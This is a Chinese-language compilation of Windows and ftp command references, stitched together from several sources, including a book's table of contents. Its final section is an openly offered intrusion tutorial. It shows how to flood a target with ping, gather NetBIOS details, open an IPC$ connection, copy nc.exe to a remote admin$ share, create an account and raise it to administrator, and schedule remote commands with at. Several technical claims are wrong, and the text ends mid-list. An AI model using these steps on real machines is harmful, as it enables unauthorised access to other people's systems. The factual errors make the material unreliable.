39.nmap[inpattern outpattern]：設置文件名映射機制， 使得文件傳輸時，文件中的某些字元相互轉換， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，則傳輸文件a1.a2.a3時，文件名變為a1，a2。 該命令特別適用於遠程主機為非UNIX機的情況。
40.ntrans[inchars[outchars]]：設置文件名字元的翻譯機制，如ntrans1R，則文件名LLL將變為RRR。

41.open host[port]：建立指定ftp伺服器連接，可指定連接埠。
42.passive：進入被動傳輸方式。

43.prompt：設置多個文件傳輸時的交互提示。
44.proxy ftp-cmd：在次要控制連接中，執行一條ftp命令， 該命令允許連接兩個ftp伺服器，以在兩個伺服器間傳輸文件。第一條ftp命令必須為open，以首先建立兩個伺服器間的連接。
45.put local-file[remote-file]：將本地文件local-file傳送至遠程主機。
46.pwd：顯示遠程主機的當前工作目錄。

47.quit：同bye，退出ftp會話。
48.quote arg1，arg2...：將參數逐字發至遠程ftp伺服器，如：quote syst.

49.recv remote-file[local-file]：同get。
50.reget remote-file[local-file]：類似於get， 但若local-file存在，則從上次傳輸中斷處續傳。

51.rhelp[cmd-name]：請求獲得遠程主機的幫助。
52.rstatus[file-name]：若未指定文件名，則顯示遠程主機的狀態， 否則顯示文件狀態。

53.rename[from][to]：更改遠程主機文件名。
54.reset：清除回答隊列。

55.restart marker：從指定的標志marker處，重新開始get或put，如：restart 130。
56.rmdir dir-name：刪除遠程主機目錄。

57.runique：設置文件名只一性存儲，若文件存在，則在原文件後加後綴.1， .2等。
58.send local-file[remote-file]：同put。

59.sendport：設置PORT命令的使用。
60.site arg1，arg2...：將參數作為SITE命令逐字發送至遠程ftp主機。

61.size file-name：顯示遠程主機文件大小，如：site idle 7200。
62.status：顯示當前ftp狀態。

63.struct[struct-name]：將文件傳輸結構設置為struct-name， 預設時使用stream結構。
64.sunique：將遠程主機文件名存儲設置為只一(與runique對應)。

65.system：顯示遠程主機的操作系統類型。
66.tenex：將文件傳輸類型設置為TENEX機的所需的類型。

67.tick：設置傳輸時的位元組計數器。
68.trace：設置包跟蹤。

69.type[type-name]：設置文件傳輸類型為type-name，預設為ascii，如:type binary，設置二進制傳輸方式。
70.umask[newmask]：將遠程伺服器的預設umask設置為newmask，如：umask 3

71.user user-name[password][account]：向遠程主機表明自己的身份，需要口令時，必須輸入口令，如：user anonymous my@email。
72.verbose：同命令行的-v參數，即設置詳盡報告方式，ftp 伺服器的所有響 應都將顯示給用戶，預設為on.

73.?[cmd]：同help.

#11 十一：

7：計算機運行命令全集 winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板winmsd-----系統信息
wiaacmgr-------掃描儀和照相機向導
winchat--------XP自帶區域網聊天
mem.exe--------顯示內存使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制台
mobsync--------同步命令
dxdiag---------檢查DirectX信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁碟碎片整理程序
diskmgmt.msc---磁碟管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網路管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)命令檢查介面
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音量控製程序
sfc.exe--------系統文件檢查器
sfc /scannow---windows文件保護
tsshutdn-------60秒倒計時關機命令
tourstart------xp簡介（安裝完成後出現的漫遊xp程序）
taskmgr--------任務管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器
packager-------對象包裝程序
perfmon.msc----計算機性能監測程序
progman--------程序管理器
regedit.exe----注冊表
rsop.msc-------組策略結果集
regedt32-------注冊表編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll文件運行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁碟檢查
certmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字元映射表
cliconfg-------SQL SERVER 客戶端網路實用程序
Clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---計算機管理
cleanmgr-------**整理
ciadv.msc------索引服務程序
osk------------打開屏幕鍵盤
odbcad32-------ODBC數據源管理器
oobe/msoobe /a----檢查XP是否激活
lusrmgr.msc----本機用戶和組
logoff---------注銷命令
iexpress-------木馬捆綁工具，系統自帶
Nslookup-------IP地址偵測器
fsmgmt.msc-----共享文件夾管理器
utilman--------輔助工具管理器
gpedit.msc-----組策略

D. windows 命令行管理服務

windows 命令行管理服務可使用net和sc兩個命令.

net用於打開沒有被禁用的服務,它包含了管理網路環境、服務、用戶、登陸大部分重要的管理功能

可打開被禁用的服務。(也可以查看服務狀態)可以創建服務、刪除服務、打開與關閉服務
sc是用於與服務控制管理器和服務進行通信的命令行程序，其語法是：

E. WIN10系統有哪些運行命令

regedit 注冊表運行命令
cmd打開DOS窗口
SnippingTool 打開截圖工具
calc.exe打開計算器
shutdown -s -t 3600 定時關機，參數有間有空格，-t 後為關機倒計時秒數 shutdown -a 如果中途想取消定時關機
cleanmgr 打開系統自帶磁碟清理器
msconfig 管理啟動項
control 打開控制面板
mspaint 畫圖
write 寫字板
Notepad 新建一個記事本
slmgr.vbs -xpr 查看系統是否永久激活詳細信息
Compmgmtlauncher 打開計算管理
control 打開控制面板
explorer打開資源管理器
mrt Microsoft Windows 惡意軟體刪除工具
Notepad 新建一個記事本
taskmgr 任務管理器
dxdiag查看電腦顯卡信息
gpedit.msc 組策略命令,打開本地組策略編輯器，可以更改配置
遠程桌面連接 mstsc
這些是網上手機的比較全的快捷命令：
命令 命令功能
appwiz.cpl 卸載或更改程序
azman（Win7） 授權管理器
calc 計算器
certmgr（Win7） 證書
charmap 字元映射表
cleanmgr 磁碟清理
cliconfg SQL Server 客戶端網路實用工具
cmd 命令提示符
colorcpl 顏色管理
comexp（Win7） 組件服務
compmgmt 計算機管理
compmgmtlauncher 計算機管理
computerdefaults 設置程序訪問此計算機的默認值
control 控制面板
credwiz 存儲的用戶名和密碼
cttune ClearType文本調諧器
dccw 顯示顏色校準
dcomcnfg 組件服務
desk.cpl 屏幕解析度
devicepairingwizard 添加設備
devmgmt.msc 設備管理器
dfrgui 優化驅動器
dialer 電話括弧程序
diskmgmt.msc 磁碟管理
displayswitch 顯示切換
dpapimig 受保護的內容遷移
dpiscaling 顯示
dxdiag DirectX 診斷工具
eudcedit 專用字元編輯程序
eventvwr 事件查看器
explorer Windows 資源管理器
firewall.cpl Windows 防火牆
fsmgmt.msc 共享文件夾
fsquirt Bluetooth文件傳送
fxscover 傳真封面編輯器
gettingstarted（Win7） Windows 入門
gpedit.msc 本地組策略編輯器
hdwwiz 添加硬體
iexpress IExpress 向導
iscsicpl Microsoft iSCSI
isoburn Windows 光碟映像刻錄機
journal Windows 日記本
locationnotifications（Win7） 默認位置
lpksetup 安裝或卸載顯示語言
lusrmgr.msc 本地用戶和組
magnify 放大鏡
main.cpl 滑鼠屬性
mblctr Windows 移動中心
mdsched Windows 內存診斷
mip 數學輸入面板
mmc MMC管理控制台
mobsync 同步中心
mrt Microsoft Windows 惡意軟體刪除工具
msconfig 系統配置
msdt Microsoft 支持診斷工具
msinfo32 系統信息
mspaint 畫圖
msra Windows 遠程協助
mstsc 遠程桌面連接
napclcfg（Win7） NAP 客戶端配置
narrator 講述人設置
ncpa.cpl 網路連接
netplwiz 用戶賬戶
netproj（Win7） 連接到網路投影儀
notepad 記事本
nslookup IP地址偵測器
odbcad32 ODBC 數據源管理程序
optionalfeatures Windows 功能
osk 屏幕鍵盤
perfmon 性能監視器
powercfg.cpl 電源選項
powershell Windows Powershell
powershell_ise Windows PowerShell ISE
presentationsettings 演示設置
printbrmui 列印機遷移
printmanagement.msc 列印管理
printui 列印機用戶界面
psr 步驟記錄器
recdisc 創建系統修復光碟
regedit 注冊表編輯器
rekeywiz 加密文件系統
resmon 資源監視器
rsop 組策略結果集
rstrui 系統還原
sdclt 備份和還原
secpol.msc 本地安全策略
services.msc 服務
shrpubw 創建共享文件夾向導
sigverif 文件簽名驗證
slui Windows 激活
sndvol 音量合成器
snippingtool 截圖工具
soundrecorder（Win7） 錄音機
stikynot 便簽
sysdm.cpl 系統屬性
syskey 保護 Windows 賬戶資料庫的安全
systempropertiesadvanced 系統屬性-高級
systempropertiescomputername 系統屬性-計算機名
數據執行保護
systempropertieshardware 系統屬性-硬體
systempropertiesperformance 性能選項
systempropertiesprotection 系統屬性-系統保護
systempropertiesremote 系統屬性-遠程
tabcal 數字化校準工具
taskmgr 任務管理器
taskschd.msc 任務計劃程序
tpm.msc 受信任的平台(TPM)管理
useraccountcontrolsettings 用戶賬戶控制設置
utilman 輕松使用設置中心
verifier 驅動程序驗證程序管理器
wab 聯系人
wabmig 導入 Windows 聯系人
wbemtest WMI 測試器
wf.msc 高級安全 Windows 防火牆
wfs Windows 傳真和掃描
wiaacmgr 掃描儀
winhlp32 Windows 幫助和支持
winver 關於Windows
wmimgmt.msc WMI 管理
wmplayer Windows Media Player
write 寫字板
wscript Windows 腳本宿主設置
wscui.cpl 安全性與維護
wuapp（Win7） Windows Update
wusa Windows 更新獨立安裝程序
xpsrchvw XPS 查看器

F. Windows 命令行詳解手冊：第2版的目錄

第一部分windows命令行基礎.
第1章windows命令行概述 2
1.1命令行基礎 2
1.1.1理解windows命令shell 2
1.1.2理解ms-dos命令shell 5
1.1.3理解windows powershell 6
1.1.4配置命令行屬性 8
1.1.5使用命令歷史 9
1.2使用補充的組件 10
1.2.1在windows vista中使用微軟遠程伺服器管理工具 10
1.2.2注冊遠程伺服器管理工具包 10
1.2.3配置與選擇遠程伺服器管理工具 11
1.2.4刪除遠程伺服器管理工具 11
1.2.5刪除遠程伺服器管理工具軟體包 12
第2章充分利用命令行 13
2.1管理命令shell的啟動方式 13
2.2使用命令路徑進行工作 15
2.2.1管理命令路徑 15
2.2.2管理文件擴展與文件關聯 16
2.3標准輸入、輸出及錯誤日誌的重定向 17
.2.3.1將標准輸出重定向到其他命令 17
2.3.2i/o與文件的重定向 18
2.3.3標准錯誤輸出的重定向 18
2.4命令的結鏈與分組 19
2.4.1使用命令鏈 19
2.4.2命令分組 20
第3章命令行腳本基礎 21
3.1創建命令行腳本 21
3.2腳本的常見語句與命令 22
3.2.1清除命令shell窗口 23
3.2.2為腳本添加註釋 23
3.2.3管理文字的顯示方式與命令回顯方式 24
3.2.4使用@對命令回顯進行調整 25
3.2.5設置控制台窗口的標題與顏色 25
3.3向腳本傳遞參數 26
3.4熟悉變數 27
3.5在腳本中使用變數 28
3.5.1變數命名 28
3.5.2設置變數值 29
3.5.3替換變數值 30
3.5.4變數作用范圍局部化 31
3.6使用數學表達式 32
3.6.1使用算術運算符與賦值運算符 32
3.6.2理解運算符的優先順序 33
3.6.3模擬指數操作 33
3.7命令行選擇語句 34
3.7.1使用if語句 34
3.7.2使用if not語句 35
3.7.3使用if defined與if not defined語句 35
3.7.4使用嵌套的 if 語句 35
3.7.5在 if 語句中進行比較 36
3.8命令行迭代語句 36
3.8.1迭代的基礎 36
3.8.2遍歷一系列值 37
3.8.3在成組的文件中迭代執行 38
3.8.4在目錄中迭代執行 38
3.8.5分析文件的內容與輸出 40
3.9創建子程序與過程 41
3.9.1使用子程序 42
3.9.2使用過程 43
第二部分使用命令行管理windows系統
第4章部署windows伺服器 46
4.1伺服器配置管理 46
4.2使用角色、角色服務與功能 47
4.3管理角色、角色服務與功能 51
4.3.1servermanagercmd基礎 51
4.3.2查詢已安裝的角色、角色服務與功能 56
4.3.3安裝角色、角色服務與功能 57
4.3.4移除角色、角色服務與功能 58
第5章管理windows系統 59
5.1檢查系統信息 59
5.2操作注冊表 61
5.2.1理解注冊表與鍵值 61
5.2.2查詢注冊表值 63
5.2.3比較注冊表值 63
5.2.4注冊表鍵的保存與恢復 64
5.2.5添加註冊表鍵 65
5.2.6復制注冊表鍵 65
5.2.7刪除注冊表鍵 66
5.2.8導入與導出注冊表鍵 66
5.2.9載入與卸載注冊表鍵 67
5.3管理系統服務 69
5.3.1查看已配置的服務 69
5.3.2啟動、終止與暫停服務 71
5.3.3配置服務的啟動方式 72
5.3.4配置服務的登錄方式 72
5.3.5配置服務的恢復方式 73
5.4從命令行重啟與關閉系統 75
5.4.1管理本地系統的重啟與關閉 76
5.4.2管理遠程系統的重啟與關閉 76
5.4.3添加關機或重啟原因與注釋 77
第6章事件記錄、追蹤與監控 79
6.1windows事件日誌 79
6.2查看與過濾事件日誌 82
6.2.1查看事件 82
6.2.2過濾事件 83
6.3向事件日誌中寫入自定義事件 85
6.4創建與使用保存的查詢 86
6.5性能監控：基礎 89
6.5.1理解如何在命令行中進行性能監控 89
6.5.2追蹤性能數據 90
第7章進程監控與性能維護 94
7.1管理應用程序、進程與性能 94
7.1.1理解系統與用戶進程.. 94
7.1.2檢查運行中進程 95
7.1.3監控系統資源使用情況與進程 101
7.1.4終止進程 106
7.2通過監控來檢測與解決性能問題 108
7.2.1監控內存分頁與磁碟頁面 108
7.2.2監控單個進程的內存使用與working memory set 109
7.2.3解決性能瓶頸 111
第8章管理事件與性能日誌 114
8.1管理事件日誌 114
8.1.1開始使用wevtutil 114
8.1.2列出可用的日誌與已注冊的事件發布者 115
8.1.3查看與改變日誌配置 117
8.1.4導出與操作事件日誌 119
8.1.5清除事件日誌 122
8.2企業級集中化事件記錄機制 122
8.2.1配置事件轉發與收集 123
8.2.2創建訂閱 124
8.2.3管理訂閱 128
8.3性能日誌 130
8.3.1開始使用數據收集器集 130
8.3.2操作數據收集器集 131
8.3.3收集性能計數器數據 133
8.3.4配置性能計數器警報 136
8.3.5查看數據收集器報告 139
第9章計劃任務的自動運行 141
9.1在本地與遠程系統上執行計劃任務 141
9.1.1計劃任務簡介 141
9.1.2監控計劃任務 145
9.2使用任務計劃程序計劃任務 146
9.2.1創建基本任務 146
9.2.2創建高級任務 148
9.2.3管理任務屬性 150
9.2.4激活與禁用任務 150
9.2.5將任務復制到其他計算機 150
9.2.6立即運行任務 150
9.2.7移除不需要的任務 150
9.3使用schtasks設置任務計劃 151
9.3.1使用schtasks/create創建計劃任務 151
9.3.2創建由windows事件觸發的計劃任務 156
9.3.3使用schtasks /change改變計劃任務 157
9.3.4使用schtasks/query查詢已配置的任務 159
9.3.5使用xml配置文件創建任務 159
9.3.6使用schtasks /run立即運行任務 163
9.3.7使用schtasks /end終止運行中的任務 163
9.3.8使用schtasks/delete刪除任務 164
第三部分使用命令行管理windows文件系統和磁碟
第10章配置與維護磁碟 166
10.1使用diskpart 166
10.1.1diskpart基礎 166
10.1.2diskpart：一個實例 167
10.1.3理解焦點及其內涵 167
10.1.4diskpart命令與腳本 167
10.1.5diskpart：腳本實例 170
10.2安裝與管理硬碟驅動器 172
10.2.1安裝與檢查新驅動器 172
10.2.2檢查驅動器狀態與配置 173
10.2.3修改驅動器分區風格 174
10.3操作基本磁碟與動態磁碟 175
10.3.1理解基本磁碟與動態磁碟 176
10.3.2設置活動分區 177
10.3.3改變磁碟類型：基本磁碟與動態磁碟的互相轉換 177
10.4磁碟維護 178
10.4.1使用fsutil獲取磁碟信息並管理文件系統 178
10.4.2檢查磁碟的錯誤與壞扇區 180
10.4.3修正磁碟錯誤 183
10.4.4對系統啟動時的自動檢測進行控制 184
10.5磁碟碎片整理 185
第11章對基本磁碟進行分區 188
11.1獲取分區信息 188
11.2創建分區 189
11.2.1在mbr磁碟上創建分區 189
11.2.2在gpt磁碟上創建分區 190
11.3管理盤符與掛載點 192
11.3.1分配驅動器盤符或掛載點 192
11.3.2改變驅動器盤符或掛載點 193
11.3.3移除盤符或掛載點 193
11.4格式化分區 194
11.4.1使用format 194
11.4.2使用filesystems 195
11.4.3格式化：一個實例 197
11.5管理分區 198
11.5.1將分區或卷轉換為ntfs 198
11.5.2改變或刪除卷標 200
11.5.3壓縮分區或卷 200
11.5.4擴展分區或卷 201
11.5.5刪除分區 202
第12章管理動態磁碟上的卷與raid 203
12.1獲取卷信息與狀態 203
12.2創建並管理簡單卷 205
12.2.1創建簡單卷 205
12.2.2擴展簡單卷 206
12.2.3將動態磁碟聯機 206
12.2.4刪除卷 207
12.3通過動態磁碟上的raid提供容錯功能 207
12.3.1實現raid-0：磁碟分割 208
12.3.2實現raid-1：磁碟鏡像與雙控 209
12.3.3實現raid-5：帶奇偶校驗的磁碟分割 210
12.4管理raid並從失效中恢復 212
12.4.1分離鏡像集 212
12.4.2重新同步與修復鏡像集 212
12.4.3修復不帶奇偶校驗信息的raid-0條帶集 213
12.4.4重建帶奇偶校驗信息的raid-5條帶集 213
第四部分使用命令行管理windows活動目錄
第13章核心目錄服務管理 216
13.1從命令行控制活動目錄 216
13.1.1理解域、容器與對象 216
13.1.2理解活動目錄中的邏輯結構與物理結構 217
13.1.3理解區分名 218
13.1.4使用活動目錄命令行工具 218
13.2使用dsquery命令進行目錄查詢 219
13.2.1dsquery子命令及語法 220
13.2.2使用名稱、描述、sam賬號名進行搜索 221
13.2.3設定搜索的登錄域與run as許可許可權 222
13.2.4設定開始節點、搜索范圍與對象限制 223
13.2.5設定名的輸出格式 225
13.2.6結合使用dsquery與其他活動目錄命令行工具 226
13.3搜索問題用戶與計算機賬號 226
13.4對象的重命名與移動 227
13.5從活動目錄中移除對象 228
第14章管理計算機賬號與域控制器 229
14.1從命令行管理計算機賬號概覽 229
14.2在活動目錄域內創建計算機賬號 230
14.2.1創建計算機賬號 230
14.2.2定製計算機賬號屬性與組成員關系 231
14.3管理計算機賬號屬性 232
14.3.1查看與尋找計算機賬號 232
14.3.2設置或修改計算機的位置與描述信息屬性 234
14.3.3禁用與激活計算機賬號 234
14.3.4重置鎖定的計算機賬號 235
14.3.5將計算機賬號添加到某域中 236
14.3.6對計算機與計算機賬號進行重命名 237
14.3.7移動計算機賬號 238
14.3.8刪除計算機賬號 238
14.4操作域控制器 239
14.4.1安裝與降級域控制器 239
14.4.2在活動目錄中發現域控制器 239
14.5指定全局編目伺服器 240
14.5.1發現全局編目伺服器 240
14.5.2添加或移除全局編目伺服器 241
14.5.3檢查緩存與優先的全局編目設置 241
14.6指定操作主機 242
14.6.1發現操作主機 243
14.6.2使用命令行配置操作主機角色 244
14.7發現只讀的域控制器 246
第15章管理活動目錄用戶與組 247
15.1從命令行中管理用戶賬號概覽 247
15.2添加用戶賬號 249
15.2.1創建域用戶賬號 249
15.2.2自定義域用戶賬號屬性與組成員關系 250
15.2.3創建本地用戶賬號 252
15.3管理用戶賬號 253
15.3.1查看與查找用戶賬號 253
15.3.2確定單獨用戶賬號的組成員關系 254
15.3.3設置或更改用戶賬號屬性 255
15.3.4禁用與激活用戶賬號 256
15.3.5重置過期的用戶賬號 256
15.3.6控制與重置用戶口令 257
15.3.7移動用戶賬號 258
15.3.8用戶賬號重命名 258
15.3.9刪除用戶賬號 259
15.4從命令行管理組賬號概覽 259
15.5添加組賬號 260
15.5.1創建安全組與分發組 261
15.5.2創建本地組並為其分配成員 262
15.6管理組賬號 263
15.6.1查看與尋找組賬號 263
15.6.2確定組成員關系 264
15.6.3改變組類型或范圍 265
15.6.4添加、移除或替換組成員 265
15.6.5移動組賬號 267
15.6.6組賬號重命名 267
15.6.7刪除組賬號 268
第五部分使用命令行管理網路
第16章管理網路列印機與列印服務 270
16.1獲取列印機的支持信息與故障排除信息 270
16.1.1在命令行中操作列印機 270
16.1.2追蹤列印驅動程序與列印機信息 271
16.1.3獲取用於容量規劃與故障排除的列印詳細統計資料 274
16.2管理列印機 278
16.2.1安裝物理連接的列印設備 279
16.2.2安裝網路連接的列印設備 280
16.2.3列出計算機上配置的列印機 280
16.2.4查看與設置默認列印機 281
16.2.5列印機重命名 281
16.2.6刪除列印機 282
16.3管理網路連接列印機的tcp/ip埠 282
16.3.1為列印機創建與改變tcp/ip埠 282
16.3.2列出列印機使用的tcp/ip埠相關的信息 283
16.3.3刪除列印機使用的tcp/ip埠 284
16.4配置列印機屬性 284
16.4.1添加註釋與位置信息 285
16.4.2共享列印機 285
16.4.3在活動目錄中發布列印機 285
16.4.4設置分隔頁並改變列印設備模式 286
16.4.5列印任務的調度與優先順序設置 286
16.4.6配置緩沖池與其他高級列印機選項 287
16.5解決緩存問題 288
16.5.1檢查print spooler服務 288
16.5.2修復損壞的緩沖池 289
16.6管理列印隊列與單個列印任務 289
16.6.1查看隊列中的任務 289
16.6.2列印機的暫停與恢復 290
16.6.3清空列印隊列 290
16.6.4暫停、恢復與重啟單個文檔的列印 291
16.6.5移除文檔並取消列印任務 291
16.7備份與恢復列印伺服器配置 292
16.7.1備份列印伺服器的配置 292
16.7.2恢復列印伺服器的配置 293
16.7.3遷移列印機與列印隊列 294
第17章tcp/ip網路的配置、管理與故障排除 295
17.1使用網路服務shell 295
17.1.1操作netsh上下文 295
17.1.2操作遠程計算機 297
17.1.3操作腳本文件 298
17.2管理tcp/ip設置 299
17.2.1配置ipv4 299
17.2.2配置ipv6 304
17.3支持tcp/ip網路 307
17.3.1獲取並保存tcp/ip設置 307
17.3.2檢查ip地址與網路介面配置 309
17.3.3操作tcp internet控制與錯誤消息 310
17.3.4檢查分片、重組、錯誤消息的詳細信息 312
17.3.5檢查當前的tcp與udp連接 313
17.4排除tcp/ip網路故障 317
17.4.1查看診斷信息 317
17.4.2診斷常規的計算機配置問題 318
附錄a基本命令行工具參考 330
附錄bnetsh快速參考... 367

G. windows xp的常用命令有什麼，

必須掌握的八個cmd命令
一、ping
它是用來檢查網路是否通暢或者網路連接速度的命令。作為一個生活在網路上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網路上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車。所示的幫助畫面。在此，我們只掌握一些基本的很有用的參數就可以了（下同）。
-t 表示將不間斷向目標IP發送數據包，直到我們強迫其停止。試想，如果你使用100M的寬頻接入，而目標IP是56K的小貓，那麼要不了多久，目標IP就因為承受不了這么多的數據而掉線，呵呵，一次攻擊就這么簡單的實現了。
-l 定義發送數據包的大小，默認為32位元組，我們利用它可以最大定義到65500位元組。結合上面介紹的-t參數一起使用，會有更好的效果哦。
-n 定義向目標IP發送數據包的次數，默認為3次。如果網路速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那麼就定義為一次吧。
說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在後面的參數為標准，比如"ping IP -t -n 3"，雖然使用了-t參數，但並不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的 IP。
下面我們舉個例子來說明一下具體用法。
這里time=2表示從發出數據包到接受到返回數據包所用的時間是2秒，從這里可以判斷網路連接速度的大小。從TTL的返回值可以初步判斷被 ping主機的操作系統，之所以說"初步判斷"是因為這個值是可以修改的。這里TTL=32表示操作系統可能是win98。
（小知識：如果TTL=128，則表示目標主機可能是Win2000；如果TTL=250，則目標主機可能是Unix）
至於利用ping命令可以快速查找區域網故障，可以快速搜索最快的QQ伺服器，可以對別人進行ping攻擊……這些就靠大家自己發揮了。
二、nbtstat
該命令使用TCP/IP上的NetBIOS顯示協議統計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網卡的MAC地址等。在此我們就有必要了解幾個基本的參數。
-a 使用這個參數，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息（下同）。
-A 這個參數也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。
-n 列出本地機器的NETBIOS信息。
當得到了對方的IP或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們入侵的保險系數。
三、netstat
這是一個用來查看網路狀態的命令，操作簡便功能強大。
-a 查看本地機器的所有開放埠，可以有效發現和預防木馬，可以知道機器所開的服務等信息。
這里可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等。用法：netstat -a IP。
-r 列出當前的路由信息，告訴我們本地機器的網關、子網掩碼等信息。用法：netstat -r IP。
四、tracert
跟蹤路由信息，使用此命令可以查出數據從本地機器傳輸到目標主機所經過的所有途徑，這對我們了解網路布局和結構很有幫助。
這里說明數據從本地機器傳輸到192.168.0.1的機器上，中間沒有經過任何中轉，說明這兩台機器是在同一段區域網內。用法：tracert IP。
五、net
這個命令是網路命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車。
在這里，我們重點掌握幾個入侵常用的子命令。
net view
使用此命令查看遠程主機的所以共享資源。命令格式為net view IP。
net use
把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: IPsharename。上面一個表示把 192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接（net use IP IPC$"password" /user:"name"）。
建立了IPC$連接後，呵呵，就可以上傳文件了： nc.exe 92.168.0.7admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合後面要介紹到的其他DOS命令就可以實現入侵了。
net start
使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後，如果發現它的什麼服務沒有啟動，而你又想利用此服務怎麼辦？就使用這個命令來啟動吧。用法：net start servername，成功啟動了telnet服務。
net stop
入侵後發現遠程主機的某個服務礙手礙腳，怎麼辦？利用這個命令停掉就ok了，用法和net start同。
net user
查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。
1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。
2，net user abcd /del，將用戶名為abcd的用戶刪除。
3，net user abcd /active:no，將用戶名為abcd的用戶禁用。
4，net user abcd /active:yes，激活用戶名為abcd的用戶。
5，net user abcd，查看用戶名為abcd的用戶的情況。
net localgroup
查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法： net localgroup groupname username /add。
現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了，呵呵，你可以再使用 net user abcd來查看他的狀態。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員，這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。
net time
這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面，那麼也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎？我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段（後面會講到）可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法：net time IP。
六、at
這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序（知道net time的重要了吧？）。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以後的某個時間（比如2分鍾後）執行某個程序和命令。用法：at time command computer。
表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務（這里net start telnet即為開啟telnet服務的命令）。
七、ftp
大家對這個命令應該比較熟悉了吧？網路上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去。現在如果你掃到了一台開放 ftp服務的主機（一般都是開了21埠的機器），如果你還不會使用ftp的命令怎麼辦？下面就給出基本的ftp命令使用方法。
首先在命令行鍵入ftp回車，出現ftp的提示符，這時候可以鍵入"help"來查看幫助（任何DOS命令都可以使用此方法查看其幫助)。
大家可能看到了，這么多命令該怎麼用？其實也用不到那麼多，掌握幾個基本的就夠了。
首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入"open 主機IP ftp埠"回車即可，一般埠默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。
用戶名和密碼都是ftp，密碼是不顯示的。當提示**** logged in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。
接下來就要介紹具體命令的使用方法了。
dir 跟DOS命令一樣，用於查看伺服器的文件，直接敲上dir回車，就可以看到此ftp伺服器上的文件。
cd 進入某個文件夾。
get 下載文件到本地機器。
put 上傳文件到遠程伺服器。這就要看遠程ftp伺服器是否給了你可寫的許可權了，如果可以，呵呵，該怎麼利用就不多說了，大家就自由發揮去吧。
delete 刪除遠程ftp伺服器上的文件。這也必須保證你有可寫的許可權。
bye 退出當前連接。
quit 同上。
八、telnet
